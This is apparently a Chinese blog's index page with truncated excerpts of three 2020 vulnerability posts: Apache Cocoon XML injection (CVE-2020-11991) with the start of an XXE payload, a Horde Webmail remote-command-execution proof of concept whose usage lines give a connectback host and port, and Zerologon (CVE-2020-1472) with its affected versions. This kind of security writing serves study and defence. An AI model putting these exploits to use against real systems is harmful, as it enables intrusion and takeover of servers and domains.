2020HW
逗比大师
CSDN停更,博x园平台保持更新
展开
-
Apache Cocoon XML注入 [CVE-2020-11991]
受影响版本:Apache Cocoon <= 2.1.x 程序使用了StreamGenerator这个方法时,解析从外部请求的xml数据包未做相关的限制,恶意用户就可以构造任意的xml表达式,使服务器解析达到XML注入的安全问题。 以下是apache社区官方提供利用方式: <!--?xml version="1.0" ?--> <!DOCTYPE replace [...原创 2020-09-13 21:15:00 · 236 阅读 · 0 评论 -
Horde Groupware Webmail Edition 远程命令执行
saturn:~ mr_me$ ./poc.py (+) usage ./poc.py <target> <path> <user:pass> <connectback:port> (+) eg: ./poc.py 172.16.175.148 /horde/ hordeuser:pass123 172.16.175.1:1337 satur...原创 2020-09-13 21:18:00 · 282 阅读 · 0 评论 -
CVE-2020-1472 域内提权
攻击者通过NetLogon(MS-NRPC),建立与域控间易受攻击的安全通道时,可利用此漏洞获取域管访问权限。成功利用此漏洞的攻击者可以在该网络中的设备上运行经特殊设计的应用程序。 影响版本 Windows Server 2008 R2 for x64-based Systems Service Pack 1 Windows Server 2008 R2 for x64-based Syste...原创 2020-09-16 05:52:00 · 89 阅读 · 0 评论